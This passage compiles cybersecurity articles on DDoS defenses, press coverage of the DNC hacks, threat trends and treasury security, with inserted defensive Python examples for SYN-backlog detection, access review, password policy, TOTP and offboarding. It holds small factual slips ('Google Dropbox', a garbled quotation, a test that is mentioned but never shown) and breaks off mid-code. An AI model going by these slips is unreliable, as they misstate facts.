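def suspicious_ports(text, max_half_open=3, max_ratio=1.0):
    """Ports whose half-open backlog exceeds a count, or outgrows the established connections."""
    flagged = []
    for port, s in half_open_summary(text).items():
        ratio = s["half_open"] / max(s["established"], 1)
        if s["half_open"] > max_half_open or ratio > max_ratio:
            flagged.append(port)
    return sorted(flagged)


if __name__ == "__main__":
    for port, s in sorted(half_open_summary(SAMPLE_SS_OUTPUT).items()):
        print(f"port {port}: {s}")
    print("suspicious ports:", suspicious_ports(SAMPLE_SS_OUTPUT))
```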

12. Use Proxy Protection

Proxy protection provides an extra layer of DDoS protection for any website and keeps your
website safe from complex cyber threats. Our remote DDoS proxy protection hides your real IP
from hackers and sends proxy traffic through its mitigation network. The best part is that the
entire process occurs without the visitors realizing it. Furthermore, remote proxy protection
increases the security and performance of HTTP applications. It's a must for any business
looking to create an impact in the online world.

13. Set up RST Cookies

RST cookies are a strong defense against DDoS: the server deliberately sends an incorrect
SYN-ACK to the client, and a legitimate client replies with an RST packet reporting the error,
which shows the server it is talking to a real host, whereas a spoofed source never answers.
Therefore, it protects the business from a potential attack.

14. Filter UDP Traffic With Remote Black Holing

Filtering UDP traffic with remote black holing can effectively stop undesirable traffic from entering
a protected network. These remote black holes are destinations to which the traffic is forwarded and
then dropped; when an attack is detected, all traffic matching the IP address and the destination
is dropped. Here are the three steps to set it up:

Prepare a null route
Prepare a route map
Generate a victim route on the management router

Learn more about the various types of DDoS attacks and contact us to see which type of
hosting is right for you.

About The Author

Todd Reagor is the Founder and CEO of RivalHost. He is the only employee, as his support team
is outsourced. Todd lives in Edmond, Oklahoma with his family.

Todd can be reached online at todd@rivalhost.com, and at our company website:
https://www.rivalhost.com/

DNC, Clinton campaign hacks highlight need for journalists to
move past content and focus on how easily it was stolen
By Andrew Conte, director of the Center for Media Innovation at Pittsburgh's Point Park
University, and Brian Nussbaum, assistant professor of Homeland Security and Cyber Security at
the University of Albany, SUNY

The U.S. intelligence community recently released substantial documentation of both the
forensic investigation around the hacking of the Democratic National Committee, as well as
broader influence operations through hacks of officials such as Clinton campaign chairman John
Podesta and the use of false and manufactured stories on social media. Russia's civilian and
military intelligence services have been identified as the source of this information and attacks.

Yet, until national intelligence officials released these details, news stories focused almost
exclusively on the contents of the pilfered messages rather than how easily such sensitive
materials were stolen.

According to the United States intelligence community, the focus on those contents appears to
have been the goal of a broad information operation by the Russian state designed to have
political effects in the American electoral system.

This is arguably the largest cybersecurity story since Stuxnet; but for most of it, the focus was
on the trees rather than the forest.

As the pace and size of online theft grows exponentially, reporters must keep up even though
it's yet another added challenge to a media industry already under assault from cutbacks and
falling advertising revenues.

Certainly, many news outlets are aware of this need. The coverage of cybersecurity issues has
not only been deeper as of late, but broader as well.

Reporters at major national newspapers such as Ellen Nakashima at The Washington Post
and Nicole Perlroth at The New York Times have offered continuous streams of reporting
across aspects of cybersecurity.

Other national papers have introduced new sections, such as the Christian Science Monitor's
Passcode, to focus on these issues. Large national news magazines, including Wired, Forbes and
Bloomberg Businessweek, have consistently offered excellent coverage of cybersecurity
issues.

While these large national newspapers and news magazines perform well, perhaps the more
interesting story comes in the form of the other sorts of news outlets that have been thriving
alongside these well-known outlets.

Smaller regional newspapers have been providing excellent coverage of cybersecurity issues;
this despite the fact that these are the papers that are supposed to be experiencing the worst of
the cutbacks.

The San Diego Union Tribune, based in a city with important technology industries, has been
reporting extensively and effectively on cybersecurity issues at a level that is disproportionate to
its size.

While many smaller papers may have decreased their state capital coverage or become more
reliant on wire services, these papers show that institutional focus on an issue like cybersecurity
can translate into important news coverage.

There is increasingly an ecosystem of often mutually reinforcing new voices and institutions that
are making the coverage of cybersecurity issues ever more exciting, too. Nonprofit journalism
organizations such as ProPublica, whose Julia Angwin has been doing excellent work on
surveillance, have come to play an important role.

New media organizations such as Vice, through its Motherboard digital news portal, and Ars
Technica have become go-to sources for news from the digital battlefield.

Even traditional magazines that don't focus on national news, but on narrower topics, have
thrived on this issue. For example, Consumer Reports has produced impressive work on how
individuals can improve their privacy from tracking by governments and corporations alike.

Finally, even lone journalists, the archetype of whom in the cyber world is Brian Krebs, have
leveraged the web as a forum from which to continue conducting investigative journalism on
cybersecurity topics.

Krebs, operating on his own, often is the first to report major breaches, and he frequently ends
up alone facing threats from hackers upset by his reporting.

Despite all of these advances, reporters face the challenge of trying to keep up with a rapidly
changing field as technology grows and criminals exploit new ways of stealing information,
secrets and money.

Too often, reporters show little understanding for the depths of the secret internet or the
intricacies of how hacking works.

These are complicated issues even for the experts. Behind closed doors at government
agencies, at major corporations and at a growing number of cyber-safety-focused nonprofits,
executives and leaders struggle to understand the evolving scope of threats.

Too frequently these same leaders see journalists and media coverage as another challenge to
be avoided; either because reporters reveal vulnerabilities or defense strategies, or because
they increase the impact of attacks by endlessly reporting on them.

As recent incidents show, journalists need to be more vigilant by digging deeper and taking the
time to understand the nuances of computer security and the potential impact of cyberattacks.
And to do this, they will need the trust and help of computer experts.

Without a greater focus on the dangers, journalists could find themselves manipulated, putting
the public at risk.

About the Authors

Andrew Conte:
Andrew Conte serves as the founding director of Point Park University's
Center for Media Innovation. He also is a contributing writer at the Pittsburgh
Tribune-Review and a best-selling nonfiction author. Andrew's latest book, All
About Roberto Clemente, tells the story of the Pirates outfielder and Puerto
Rican native. It's written for advanced elementary and middle school readers.
Previously, Andrew wrote The Color of Sundays, which explores the role of
race in the National Football League and how the Pittsburgh Steelers used the
league's prejudice to the team's advantage. He also authored the best-selling
sports book Breakaway, which was re-released in paperback in the fall of
2016 with a new chapter on the Penguins hockey team's latest Stanley Cup championship.
Andrew is a graduate of Columbia University's Graduate School of Journalism and Dickinson
College.

Brian Nussbaum:
Dr. Brian Nussbaum is an assistant professor in the Department of Public
Administration and Policy. His focus is on cybersecurity and cyber threats,
terrorism and terrorism analysis, homeland security, risk and intelligence
analysis, and critical infrastructure protection. He also serves as an Affiliate
Scholar with the Center for Internet and Society (CIS) at Stanford Law
School, and as a Senior Fellow with the Center for Cyber and Homeland
Security (CCHS) at George Washington University. Dr. Nussbaum formerly
served as senior intelligence analyst with the New York State Office of
Counter Terrorism (OCT), a part of the New York State Division of Homeland
Security and Emergency Services (DHSES). He oversaw both terrorism and cyber threat
analysis efforts at New York's designated state fusion center, the New York State Intelligence
Center (NYSIC).

THE GLOBAL CYBER SECURITY BATTLE
LAPTOPS WILL BE THE ARTILLERY OF THE FUTURE
by David J. O'Reilly, Managing Director, Hampton Court Capital

Every political and military conflict now has a cyber security aspect to it, which has led
governments to treat the build-up of highly advanced defences in this area with the same
importance as they would the acquisition of a new aircraft carrier or a fleet of warships or jet
fighters.

In the UK, we have seen the recent formal opening of a National Cyber Security Centre (NCSC)
by the Queen this month, where GCHQ staff will work closely with the best and the brightest
private sector experts to help identify and counter cyber security threats against UK assets.

A perfect storm of events and developments are driving exponential growth in the Cyber
Security sector globally: the growing rise of cyber attacks and the proliferation of new malware
technology such as ransomware, as well as the widespread use of multiple devices as part of
the internet of things such as intelligent domestic appliances and mobile devices.

Gartner estimate that worldwide IT security spending will more than double from $77 billion in
2015 to $170 billion by 2020.

Investors are eagerly deploying capital into new companies in the cyber security sector, many of
which make use of artificial intelligence and machine learning to grapple with the epic task of
interpreting and responding to the truly mammoth volume of data that spews forth from servers
and networks globally each second.

Small to medium sized companies often think that because high profile cyber security news
stories usually refer to governments or large global companies being hacked, such as the US
election hacking rumours or the well documented attack on TalkTalk here in the UK, they do not
need to worry as they are too small to be a worthwhile target; nothing could be further from the
truth.

Cyber attacks are not someone else's problem; they are your problem, and they need to be
viewed as a potential spear in your side that is tackled head on and skillfully deflected, not as a
gaping wound that is stitched up and patched over after the attack.

Regardless of the size of your company, household, government department, hospital,
university or police force, you are a potential target and you need to mitigate the risks.

Ransomware was the biggest growing malware variant in 2016, and it represents a highly
disturbing evolution in the cyber security landscape that should make everyone, from
households to the largest international companies and government agencies, sit up and take
note. This is malicious software that blocks access to a computer until you pay to fix it.

Black market prices have fallen for large batches of personal data such as addresses and credit
card numbers, forcing malevolent individuals to switch their attention onto extorting money from
personal victims.

The bulk of these attacks come through malicious email attachments, and the ingenuity and skill
the hackers apply to extort money is truly breathtaking.

The risks have never been as severe: there were 188 cyber attacks classed by the NCSC as
Category 2 or 3 during the last three months, although the UK has not yet experienced a
Category 1 attack, the highest level (for example, the attack on the US Office Of Personnel
Management was a Category 1 attack, with millions of confidential American public service
personnel records stolen).

Hackers managed to steal $81 million from the Bangladesh Central Bank according to media
reports in 2016, prompting others to upgrade their security, but I am still not convinced that C-
suite teams understand that cyber security permeates every aspect of a company's DNA and is
the responsibility of every individual, not just the IT department.

I fear that hacks, cyber attacks and digital heists similar to the experience of the unfortunate
Bangladesh Central Bank will increase in coming years and become an increasingly common
occurrence.

Threats such as ransomware will be even more dangerous due to the number of interconnected
devices and smart phones in our homes and offices.

The internet of things may well end up being re-named the internet of weaknesses or the
internet of vulnerabilities.

Quite often, the biggest threat comes from inside a business, where poor internal controls and
dangerous internal practices are Achilles' heels for many companies.

For example, a study of leaked passwords last year that analyzed 10 million leaked passwords
found that 17% of accounts sampled were secured with the password 123456.

This all goes to demonstrate how much IT security is a make-or-break business issue;
traditionally, companies, government departments and security agencies have treated this area
as a matter for their IT department. It requires a leader who reports directly to a senior
executive, if not to the board itself.

The specific job title of this individual is not important, but rather their ability to bring key IT
security issues to the C-suite directly with clarity, authority and sufficient gravitas to help the
management team think through and discuss how security affects every single business
decision.

Effective cyber security leaders are those who can demonstrate the linkages between security
and the companys strategic objectives and goals.

They are effective at reminding the rest of the management team that cyber security is a
strategic matter, not an IT department matter.

The most successful companies of the future will be those who invest in cyber security systems
and in the right experts, both internal staff and external consultants and cyber security
specialists, who are able to effectively detect, analyse and resolve a vast range of international
cyber security threats in real time using cutting-edge systems.

Companies are increasingly making use of cutting-edge cyber security products and advice on a
managed security services basis, with the result being that this market is expected to be worth
$34 billion by 2021 according to Markets And Markets research.

The key to success will be the ability to proactively plan for attacks and detect them as they
occur.

Companies and government agencies need to be able to move from a "situation calm" status to
an "initial alert" status to an "attack defeated / matter resolved" status in a matter of seconds or
minutes (not hours, days or weeks) in today's environment.

By catching an incident early, security teams can reduce the overall impact (costly fixes, threats
to human life and to property, disrupted business, reputational damage, stolen IP, financial
loss).

For governments, this approach will be vital when it comes to protecting their citizens; cyber
security is no longer a matter of protecting merely a few servers with some personal details, but
quite often a matter of life and death, and of national security, with critical pieces of national
infrastructure (energy grids, hospital networks, educational institutions, government departments,
water systems, gas/oil pipelines, air traffic control networks and nuclear facilities) frequently
being discreetly measured up and assessed by those who would do us harm.

About The Author

David O'Reilly is a Managing Director at Hampton Court Capital, an award-winning international
TMT (Technology, Media and Telecoms) boutique investment bank based in London, and a senior
board advisor and non-executive director to several charities, non-profit discussion forums and
privately owned TMT companies. He is head of the UK alumni chapter for University College
Dublin.

David can be reached online at david.oreilly@hamptoncourtcapital.com and at his company
website http://www.hamptoncourtcapital.com/.

A Look Into Cyber Security
Cyber security is a top priority for organizations to keep their information and systems safe from
theft, damages, or disruptions. Find out how the enemy works, ways to defend your organization
from an attack, what hackers are capable of, and more.

By Matthew Stockham, GTreasury

Network security in cyberspace is never far from the headlines. When it does reach the
headlines, it's never good news.

Here are just a few famous, or infamous, security breaches of the not-too-distant past, even
though they might seem like ancient history by now: Target, Adobe, TJX, Home Depot, Sony
PlayStation, Heartland, Epsilon.

Hackers and cyber-thieves are, unfortunately, good at what they do and getting more
sophisticated all the time. They take advantage of gaps and weak spots in information
technology systems. But those gaps and weak spots are there, almost exclusively, because
some human being wasn't doing his or her job properly.

We can always improve our hardware and software, and we'll discuss a few ways we're doing that. But it doesn't matter how powerful or expensive your system is if you don't know how to use it.

Outdated Technology and Human Error

SWIFT is a messaging system used by banks and financial companies. SWIFT messages include, but are not limited to, payment orders. The SWIFT network itself was not hacked. But the hackers, operating from Egypt, penetrated the bank's systems and installed malware. The malware modified the bank's Alliance Access software, which reads and writes the SWIFT messages and records transactions.

The malware altered payment orders, increasing transaction amounts and changing payment
destinations. It also changed the SWIFT payment confirmation messages back to the original
amounts or deleted them entirely.

A police investigation showed that the Bangladesh Bank had no firewalls and was using second-hand, ten-dollar switches on its network. The Philippine bank was using a $25 router and default passwords. It's little wonder that the crooks were able to get into the networks. Anyone who takes security seriously knows that security demands investment. You can't expect good results by picking cheap components off the shelf, plugging them in, and hoping they'll work. The components need to be part of a coherent plan.

How The Enemy Works
Spam. Spear phishing. Social engineering. Confederates inside the target institutions. Black-hat tool kits that are more advanced than the tools that developers work with when building applications. They're all part of the arsenal that hackers use.

Nowadays we don't hear much from the deposed African prince who wants to split a hundred million bucks with us. Cyber crime has gone way beyond such stickups of unwary individuals. The cyber criminals are working full time and studying your business. They scan for the open port, look for SSL vulnerabilities, do automated testing. They seek out the one vulnerable machine on the network or the one gullible or inattentive person who clicks on a link and lets malware in.

They also learn who does your payroll, whether you use FedEx, who's your ISP. They'll send you an invoice that says your account is overdue and you'll be terminated if you don't reply. People click on the invoice link, which can look like a PDF file but which masks an executable one, without thinking. Even high-credentialed employees like executives, CFOs, and treasurers get duped. They're in a hurry, and they click on links without thinking.

All the hackers need for a response rate is for one percent of their attempts to succeed, but the
percentage of the population that falls for it is much higher than that.

More than 80% of malware that reaches its target gets distributed by phishing, or by somebody's clicking a link on a compromised web site. This campaign highlights the fact that organizations are only as strong as their weakest link, and in this case, it's their employees. IBM's 2015 Cyber Security Intelligence Index indicated 95 percent of all attacks involve some type of human error.

Attackers rely on that factor, counting on someone to open a fraudulent attachment or link. WordPress sites are a particular problem. Many people who use WordPress do it as a hobby, not in their full-time jobs. They don't keep security patches up to date. So if some hacker compromises a WordPress site and adds their own code, and then you click on one of the site's links, behind the scenes there's a software download to your machine.

Defending Your Castle

Think of your business as a castle. Build the walls and dig the moat. Most attackers are looking for the soft spots and easy pickings; they prefer to probe for open doors to your system, and to simply walk in. You can turn these intrusion attempts aside by having those walls and moat, that is, appropriate policies and components, in place.

The drawbridge and the great wooden door are the entryway to the castle. Sometimes that door must be opened, or the castle can't function in the world outside. The door should open only when needed. No other entryways, such as windows or emergency doors, should be left unlocked.

When the door is opened, be sure you have vigilant, armed, well-trained sentries on duty. They'll protect you from almost every other external threat: the attackers who go beyond casual probing to methodical intrusion attempts.

With the above measures in place, you'll be guarding against about 99% of all forays against your system.

Finally, station hundreds of vigilant guards atop the castle walls and around the base of the walls. They'll spot and dispatch the final one percent of attackers, those lone daredevils who try to scale the walls or tunnel beneath them.

To summarize: the walls and the moat are administrator rights to your system. More precisely, they're the curtailments, the strict limitations, of administrator rights. Smart, aggressive control of administrator rights can neutralize around 85% of malware attacks.
The drawbridge and sentries are password controls. Eliminate stolen passwords and you'll turn back almost all of the remaining intrusion attempts, about 14 percent of them.

But if, somehow, an attacker climbs the wall or digs underneath it, the vigilant guards that will nab him are the two-factor authentication brigade. That's the final one percent of protection.

Let's carry the castle analogy just a bit further. It will be much harder to defend the castle if you don't keep the walls mortared and if you don't keep the food and ammunition supplies fresh and plentiful. That's your hardware and software. Keep it current, and keep it patched.

Finally, if your soldiers and sentries are untrained or lazy, it doesn't matter how strong your walls are. The human factor has always posed the biggest risk in cybersecurity. All of your employees have a part to play. So keep them trained and informed. Whether they realize it or not, they're on duty all day, every day in the fight against cyber-thieves.

An Attack-in-Depth
The Dyre Wolf campaign against banks shows just how sophisticated the hackers have become. Discovered and named by IBM researchers, it's an invasion-in-depth, a mirror image of a defense-in-depth. Dyre Wolf has pulled off several million-dollar heists from banks and corporations.

Run by criminals in Eastern Europe, Dyre Wolf uses spear phishing or spam emails to get a foothold in the system. Then its minions post phony dialogue boxes about system errors, prompting a phone call to a fake service center. They lure employees of the target company into revealing their passwords and authentication codes over the phone. They also post spoofed web sites, where gullible employees think they're logging in.

Within seconds, millions of dollars get whisked away through a maze of foreign banks. The
attackers frequently launch a Distributed Denial of Service (DDoS) attack on the target bank to
prevent it from seeing what just happened.

This is all very scary. But the first, essential break in the target bank's defenses came when an employee or some other insider such as a vendor allowed a download of malware. The enemy made it through the castle walls and plucked the keys to the castle keep from another employee.

IBM's 2015 Cyber Security Intelligence Index, which describes Dyre Wolf in detail, stated that 55 percent of all attacks recorded in 2014 were carried out by those who had inside access to the target company's systems. Some of those insiders were malicious; others were unwitting dupes.

Elsewhere in that report, IBM states that 95% of actual breaches were caused by human error.

So, by now it must be obvious. You're only as strong as your weakest link, and that link is almost always an employee. So what to do?

Building A Defense
Let's return to the castle and its walls, moat, and sentries. Let's also narrow our discussion to the breaches that keep bankers and corporate treasurers tossing and turning: those that result in unauthorized transfers of money.

In broad strokes, if you start from a secure base, a system in which nobody has rights to
anything, and then you open it up to people or processes as necessary, then your solution will
be secure and will enable people to do things that must be done.

On the other hand, if you start with a system that is wide open and proceed to lock things down, you inevitably will miss locking or closing certain doors. Moreover, as things change, as people come and go or acquire new privileges and responsibilities, you've got to be especially vigilant in monitoring everyone and in shutting down additional doors. It's far easier to grant as necessary than to try to deny access once some change occurs.

Let's assume that an attacker has fooled someone into downloading malware onto his or her computer. How much damage can that do? Some, of course, but you can limit it substantially if the infected computer does not have access to administrator rights.

If the user of said computer is a standard or least-privilege user, then the worst-case damage will be limited to what that user can do. The malware can't change files, install software, change processes, and so on. In other words, it would not allow the types of changes to the SWIFT messages that hit the Bangladesh Bank.

The 2014 Microsoft Vulnerabilities Report by Avecto, a UK software firm, states that 97% of
critical Microsoft vulnerabilities could be mitigated by removing admin rights across an
enterprise.

One of the report's key findings almost reiterated the point: 97% of Critical Remote Code Execution vulnerabilities could be mitigated by removing admin rights.

The report explains mitigation by stating that "a standard user account either nullifies the vulnerability itself or nullifies the impact of the vulnerability by preventing the exploit from gaining elevated privilege throughout the user."

The Avecto report dealt with Microsoft vulnerabilities. But applications like Flash and Java can be exploited as well. Granting admin rights to them, or to any other application with known vulnerabilities, is courting disaster.

Privilege management is not a panacea. If you've got sturdy castle walls but the drawbridge is open, the barbarians will storm through the gate. At that point you're relying on your guards. But who is verifying the guards' activities? It is the familiar question: "Who's guarding the guards?"

Some guards need access to sensitive areas of the castle. Who is verifying that they're doing everything they must be doing, but only what they must be doing? This is where auditing comes in. Remember the percentage of attacks that stem from human error. Some errors are inadvertent; others are deliberate. Does an independent party review your logs, daily, of who accesses production servers? Do you have somebody who is independent of the guards' function reviewing these accesses? It is similar to the dual control of cash practiced by banks, or the "four eyes" requirement for completing an action.
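The daily, independent review of production-server access described above can be scripted. The example below is added for this page and is not the author's or GTreasury's code; the log line format, the ticket fields and the sample data are all constructed. It parses an access log, checks every successful login or privilege elevation against change tickets, and applies two "four eyes" rules: a ticket approved by its own requester does not count, and the reviewer may not be one of the people whose access is under review.

```python
"""Independent review of production-server access logs against four-eyes approvals.

Added example: constructed log format and ticket data, not from any product named in the article.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed sample access log: one line per authentication or privilege event.
SAMPLE_LOG = """\
2017-03-01T02:14:07Z host=prod-db-01 user=jdoe action=login result=success
2017-03-01T02:31:55Z host=prod-db-01 user=jdoe action=logout result=success
2017-03-01T09:02:10Z host=prod-app-02 user=asmith action=login result=success
2017-03-01T22:47:33Z host=prod-db-01 user=rlee action=login result=success
2017-03-01T22:48:01Z host=prod-db-01 user=rlee action=sudo result=success
2017-03-02T01:03:44Z host=prod-app-02 user=mwong action=login result=failure
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) "
    r"action=(?P<action>\S+) result=(?P<result>\S+)$"
)
CHECKED_ACTIONS = {"login", "sudo"}   # events that must be covered by an approval


def _utc(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


@dataclass(frozen=True)
class Approval:
    """A change ticket authorising one user on one host for a time window."""
    ticket: str
    user: str
    host: str
    requested_by: str
    approved_by: str
    start: datetime
    end: datetime

    def is_four_eyes(self):
        # The person who approves must not be the person who asked.
        return self.requested_by != self.approved_by

    def covers(self, user, host, ts):
        return (self.user == user and self.host == host
                and self.start <= ts <= self.end and self.is_four_eyes())


# Constructed tickets: CHG-1002 was approved by its requester, which the review must flag.
SAMPLE_APPROVALS = [
    Approval("CHG-1001", "jdoe", "prod-db-01", "jdoe", "cto",
             _utc("2017-03-01T02:00:00Z"), _utc("2017-03-01T03:00:00Z")),
    Approval("CHG-1002", "asmith", "prod-app-02", "asmith", "asmith",
             _utc("2017-03-01T09:00:00Z"), _utc("2017-03-01T10:00:00Z")),
]


def parse_log(text):
    """Parse recognised lines into dicts with a timezone-aware timestamp; skip anything else."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["ts"] = _utc(ev["ts"])
            events.append(ev)
    return events


def review_access(log_text, approvals, reviewer):
    """Return a list of (kind, detail) findings for an independent daily review.

    The reviewer must not appear in the log they review; every successful login or
    sudo must be covered by a ticket approved by someone other than the requester.
    """
    events = parse_log(log_text)
    if any(ev["user"] == reviewer for ev in events):
        raise ValueError("reviewer must be independent of the accounts under review")
    findings = [("SELF-APPROVED",
                 f"ticket {a.ticket} for {a.user} on {a.host} was approved by its requester")
                for a in approvals if not a.is_four_eyes()]
    for ev in events:
        if ev["action"] not in CHECKED_ACTIONS or ev["result"] != "success":
            continue
        if not any(a.covers(ev["user"], ev["host"], ev["ts"]) for a in approvals):
            findings.append(("UNAPPROVED",
                             f"{ev['ts'].isoformat()} {ev['user']} {ev['action']} on {ev['host']} "
                             f"has no four-eyes approval"))
    return findings
```

Run against the constructed data, the review produces four findings: one self-approved ticket and three accesses with no valid approval (the self-approved ticket does not cover asmith's login, and rlee has no ticket at all). Failed logins are left to the authentication monitoring rather than the access review.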

Limitations
Think about what kinds of applications your employees need in order to do their jobs. Do they need Flash installed? Or Java? Perhaps you should consider having an application whitelist, to specify what can be installed on company machines, and what will be blocked by default.
Most applications installed by users have little to do with their jobs. They may go onto Facebook. They may have a Google Dropbox. They will install things to do at lunchtime. If a company does not know what applications its employees have installed, or how they are using them, then the company will have no control over the information that is flowing through users' machines on the network.

Policies And Passwords

In the case of the Philippine bank breach mentioned above, the bank was using a $25, second-hand router. It also had no firewalls and used default passwords. Human error, anyone?

By now, it should be obvious to any user of IT that their passwords should be in a format that is
hard to guess or to discover through algorithms. Passwords should also be changed frequently.
Company policies should mandate such approaches. It is a very easy thing to enforce password
complexity. Companies should also routinely test passwords to see if they can be broken easily.

The whole issue is so familiar that we needn't go through it here. Still, there's a distressing proportion of computer users whose password is "password" or "123456".
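The policy the two paragraphs above call for (hard-to-guess passwords, enforced complexity, no "password" or "123456") is straightforward to enforce at the point where a password is set. The check below is an added example, not the author's or GTreasury's code; the minimum length, the class count and the short banned list are assumptions, and a real deployment would load a large list of breached passwords instead of the handful shown.

```python
"""Password policy check: length, character classes and a banned-password list (added example)."""
import string

# Constructed banned list; production systems load a large breached-password corpus here.
BANNED = {"password", "123456", "qwerty", "letmein", "welcome", "admin"}
MIN_LENGTH = 12
MIN_CLASSES = 3


def _normalize(pw):
    """Lower-case and strip trailing digits/punctuation so 'Password1!' still matches 'password'."""
    return pw.lower().rstrip(string.digits + string.punctuation)


def _is_sequential(pw):
    """True for keyboard-walk style runs such as 123456 or abcdef (step of +1 or -1 throughout)."""
    if len(pw) < 4:
        return False
    steps = {ord(b) - ord(a) for a, b in zip(pw, pw[1:])}
    return steps in ({1}, {-1})


def check_password(pw, username=""):
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    classes = sum([
        any(c.islower() for c in pw),
        any(c.isupper() for c in pw),
        any(c.isdigit() for c in pw),
        any(c in string.punctuation for c in pw),
    ])
    if classes < MIN_CLASSES:
        problems.append(f"fewer than {MIN_CLASSES} character classes")
    if pw.lower() in BANNED or _normalize(pw) in BANNED:
        problems.append("on the banned-password list")
    if pw and len(set(pw)) == 1:
        problems.append("single repeated character")
    if _is_sequential(pw):
        problems.append("sequential characters")
    if len(username) >= 3 and username.lower() in pw.lower():
        problems.append("contains the username")
    return problems
```

The normalisation step matters in practice: users asked for complexity tend to append a digit and a symbol to a banned word, so the banned list is consulted both with the raw input and with trailing digits and punctuation stripped.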

Single Sign-On
Single Sign-On (SSO) is another effective countermeasure. With SSO, a session and user authentication service permits a user to use one set of login credentials (e.g., name and password) to access multiple applications. It is easy to set up and manage. There are many third-party products, including Microsoft Active Directory Federation Services (ADFS), that work well. They balance the tradeoff between ease of access for the end user and tight, documented security for the auditors and internal security team.

With SSO, mandated password changes are easy. You only have to change the password in one place to update it for every application that supports SSO. You don't have to go into every system and individual application. Managing multiple passwords, and having to remember them for every system, causes a great deal of user frustration and password-related errors.

Because SSO is authentication by a trusted server within the company network, third-party applications like GTreasury do not have to make their own determination that a given user's credentials are valid. Instead, third parties can use the same trusted source that the company is using for its users' identification and validation.

Multi-Factor Authentication
Multi-factor Authentication (MFA) combines something you know (a password) with something you have. The "something you have" portion might be a physical token with a distinct, encrypted security code. It might also be a message sent to a mobile phone or a laptop computer. Even if some hacker penetrates your network and steals your password, he can't make off with the goods unless he also gets hold of the other authenticating factor.

MFA need not be applied only at login. It can also come into play at any functional point in using an application, such as approving a payment.

The Dyre Wolf guys scored despite MFA because they succeeded in getting both pieces of the
puzzle. With faked phone calls and spoofed web sites, they tricked the victims into revealing or
entering essential information like security codes or passwords. Again, this shows that no
technology is foolproof if humans mishandle it. It also shows the need to layer security, rather
than to rely on any one method or solution component.
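To make the "something you have" factor concrete, the block below implements the time-based one-time password that most hardware tokens and authenticator apps generate (RFC 4226 HOTP and RFC 6238 TOTP, HMAC-SHA1), plus a step-up gate that demands a fresh code at a sensitive action such as approving a payment rather than only at login. It is an added example, not the author's or GTreasury's code; the StepUpGate class and its replay rule are my own construction, and the shared secret used in the comments is the RFC test secret, not a real credential. Note that it is exactly the layering the Dyre Wolf paragraph calls for: a correct TOTP implementation still cannot help if the victim reads the code to a fake service centre, so the code check sits beside, not instead of, user awareness.

```python
"""RFC 6238 time-based one-time passwords and a step-up check (added example)."""
import hashlib
import hmac
import struct


def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian 8-byte counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, at_time, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time in `step`-second slots."""
    return hotp(secret, int(at_time) // step, digits)


def verify_totp(secret, submitted, at_time, step=30, digits=6, window=1):
    """Accept the code for the current slot or up to `window` slots either side (clock drift).

    Each candidate is compared with hmac.compare_digest so a single comparison does not leak
    how many leading digits matched.
    """
    counter = int(at_time) // step
    return any(hmac.compare_digest(hotp(secret, counter + d, digits), submitted)
               for d in range(-window, window + 1))


class StepUpGate:
    """Requires a fresh second factor at a sensitive action (for example approving a payment),
    not just at login, and refuses to accept a code from a slot that has already been used,
    so a code captured once cannot be replayed for a second approval (assumed design)."""

    def __init__(self, secret, step=30, digits=6):
        self.secret = secret
        self.step = step
        self.digits = digits
        self.last_counter = -1

    def approve(self, submitted, at_time):
        counter = int(at_time) // self.step
        for d in (-1, 0, 1):
            candidate = counter + d
            if candidate <= self.last_counter:
                continue   # this slot (or an older one) has already been consumed
            if hmac.compare_digest(hotp(self.secret, candidate, self.digits), submitted):
                self.last_counter = candidate
                return True
        return False


if __name__ == "__main__":
    # The RFC 6238 test secret (ASCII "12345678901234567890"); never a production value.
    secret = b"12345678901234567890"
    print("code at T=59 (8 digits):", totp(secret, 59, digits=8))   # RFC vector 94287082
```

The RFC 6238 appendix vectors (secret "12345678901234567890", SHA-1, 8 digits) are what the test below checks against, so the implementation can be trusted to interoperate with real tokens that use the same parameters.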

Mobility And The Cloud

If you do a good job of restricting administrator rights, of managing identities and passwords, and of implementing two-factor authentication, you're showing that you're serious about cyber-security. Your auditors will approve; so too should your lawyers and law-enforcement authorities.

Data breaches are a real threat nowadays, even for companies that are diligent about security. If your company's systems are breached, your legal liability may be much less if you have followed a strategy of defense-in-depth than if you were oblivious to best security practices. In the latter case, there could be additional or punitive damages assessed.

Cautionary Tales
If you're a corporate treasurer, be very careful about using your home computer or your mobile device. If you're in an airport, for instance, you might inadvertently log on to a Wi-Fi network that looks legitimate, named something like "Lagardia" or "Heatrow", and send critical data to a hacker for a man-in-the-middle attack.

Again, going back to the human element, remember that terminated employees aren't fully terminated until they no longer have access to any of your systems. When you dismiss someone, you shut off access to the internal network. But do you use one or more cloud-based services? If so, someone has to go out and delete the departed individual from every one. It takes some extra work and doesn't happen automatically unless your cloud provider's web services offer to disable terminated users' accounts.
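The offboarding gap described above is a reconciliation problem: compare who HR says still works for you with who each cloud service says has an account. The script below is an added example, not the author's or GTreasury's code; the roster, the per-service account lists and the approved-external list are constructed, and in a real run each would be fetched from the HR system and from each provider's user-listing API (assumed to exist). It normalises addresses so a differently capitalised account is not misreported, honours a dated exception list for contractors, and produces a plan an operator can review before anything is disabled.

```python
"""Offboarding reconciliation: find cloud-service accounts whose owner is no longer employed.

Added example with constructed data. A real run would pull the roster from the HR system and
each account list from the provider's user-listing API (assumed to exist for each service).
"""
from datetime import date

# Constructed: the HR system's list of currently employed people.
HR_ACTIVE = {"asmith@example.com", "rlee@example.com", "mwong@example.com"}

# Constructed: what each cloud service reports as its user list. jdoe has left the
# company; the treasury app stores one address with different capitalisation.
CLOUD_ACCOUNTS = {
    "payroll-saas": {"asmith@example.com", "jdoe@example.com", "rlee@example.com"},
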